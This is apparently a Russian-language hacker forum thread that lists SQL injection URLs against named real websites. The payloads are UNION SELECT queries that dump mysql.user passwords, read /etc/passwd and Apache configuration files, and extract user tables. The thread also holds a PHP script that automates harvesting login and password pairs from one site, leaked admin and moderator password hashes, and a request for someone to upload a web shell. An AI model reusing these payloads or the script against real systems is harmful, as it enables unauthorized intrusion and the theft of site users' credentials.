SQL Инъекции

http://www.microchip.by/info.php?id=999999999999+union+select+1,2,3,4,5/*

 

http://www.j2g.ru/show.php?id=999999999999+union+select+1,mysql.user.password,3,4,DATABASE(),6,7,8,9,10,11+from+%20%20%20%20mysql.user+limit+0,1/*
http://www.webdoski.ru/show.php?sn=999999999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
http://pmed.ru/conf/index.php?id=999999999999+union+select+1,2,3,4,5,6,7,8,9,10,11/*

 

hostobzor.ru​

​

​

http://www.hostobzor.ru/db/vds.php?pid=-1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(TABLE_NAME,0x71),0x71),1,22+from+INFORMATION_SCHEMA.TABLES+limit+32,1/*


ps наркоманы надо было так таблицы назвать...

 

(если кто шелл зальет, напишите в PM, Please...)
http://www.pinskdrev.by/forum.php?page=1&theme_id=-1+UNION+SELECT+1,2,3,4,5+from+news/*&action=show_theme

 

http://www.wmast.com.ua/web/articles.php?clause=-1+union+select+11111,22222/*

 

http://www.odyssey.od.ua/show.php?cat=pccdrom&id=999999999999+union+select+1,mysql.user.password,3,4,5+from+mysql.user+limit+0,1/*

 

http://www.evroutro.ru/index.php?pg=konkurs_izbr&id=-1+union+select+1,user(),version(),5/*

 

http://samsungpro.ru/programms/?content=browse&id=327+union+select+1,2,3,4,0x707265766564203a44/*

 

Ужас

http://karabin.com.ua/rus/news.php?news_id=1'

 

http://www.trud.ru/issue/news.php?id=-99+union+select+1,2,3,'preved ',5,6,7/*

 

http://www.ixbt.com/news/news.php?id=-99+union+select+1,2,0x707265766564203a44,4,5,6,7,8,9,10,11/*
гыы - IXBT можете юзать

 

http://aprilia.ru/news.php?id=-99+union+select+1,0x707265766564203a44,3,4,5+from+user/*
.)

 

http://astrabroker.ru/news/news.php?id=-99+union+select+1,2,3,AES_DECRYPT(%20AES_ENCRYPT(USER,0x71),0x71),5+from+mysql.user+limit+1,1/*

http://astrabroker.ru/news/news.php?id=-99+union+select+1,2,3,LOAD_FILE('/etc/passwd'),5/*

http://astrabroker.ru/news/news.php?id=-99+union+select+1,2,3,LOAD_FILE('/usr/local/apache/conf/httpd.conf'),5/*

etc... .)

 

http://www.dvoikatroika.cz/partylist.php?idprt=-388+UNION+SELECT+1,convert(login%20using%20latin2),convert(pass%20using%20latin2),4,5,6,7,8,9,0,1,2,3,4+from+users/*

 

http://www.ixbt.com/news/news.php?id=-99+union+select+1,2,login,4,5,6,7,8%20,9,password,11%20from%20user%20limit%201,1/*

 

ммм, я специально расписывать не стал =\ а ты

 

Ночью делать однозначно нечего =\:

Code:

http://www.samsung-mobile.ru/news.php?id=-99+union+select+1,2,table_name,4,5,6+from+INFORMATION_SCHEMA.TABLES/*

 

PHP:

<?
 echo "<pre>\n";
 @set_time_limit(0);
 @ini_set("display_errors","0");
 $hostname = gethostbyname('www.ixbt.com');
 function getid($limit)
 {
  global $hostname;
  $responce = "";
  $fsock    = fsockopen($hostname,80,$errnum,$errstr,2);
  $headers  = "GET http://www.ixbt.com/news/news.php?id=-99+union+select+1,2,CONCAT(CHAR(60,115,113,108,62),login,CHAR(59),password,CHAR(60,47,115,113,108,62)),4,5,6,7,8%20,9,10,11%20from%20user%20limit%20$limit,1/* HTTP/1.1\n";
  $headers .= "Host: www.ixbt.com\n";
  $headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";
  $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
  $headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n";
  $headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n";
  $headers .= "Keep-Alive: 500\n";
  $headers .= "Connection: close\n";
  $headers .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
  fwrite   ($fsock,$headers);
  while    (!feof($fsock)) $responce .= fread($fsock,1024); 
  fclose   ($fsock);
 $patern = "#<[\s]*sql[\s]*>([^<]*)<[\s]*/sql[\s]*>#i";
if(preg_match($patern, $responce, $rez)) echo $rez[1]; else echo 'Something not right...';
}
for($i=1;$i<32;$i++) {getid($i);echo "\n";}
echo "</pre>";
?>


про самсунг:

http://www.samsung-mobile.ru/news.php?id=-99+UNION+SELECT+1,2,CONCAT_WS(CHAR(59),user_id,user_name,user_real_name,user_password,user_newpassword,user_email),4,5,6+from+user/*
1;Wikiadmin;;3538bde67069fb42237f004aae66f73b;;


user_login,user_pass,user_icq,user_email,user_domain,user_activation_key


http://www.samsung-mobile.ru/news.php?id=-99+UNION+SELECT+1,2,CONCAT_WS(CHAR(59),user_login,user_pass,user_icq,user_email,user_domain,user_activation_key),4,5,6+from+blog_users/*

admin;dfed24dcf4255aa50fe4a7ebf291cece;0;[email protected];;
Moderator;d8578edf8458ce06fbc5bb76a58c5ca4;0;[email protected];;

 

MDMKino​

http://www.mdmkino.ru/filminfo.php3?id=1014%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*

 

http://www.cris.net/news.php?id=-99+union+select+1,user,password,4+from+mysql.user/*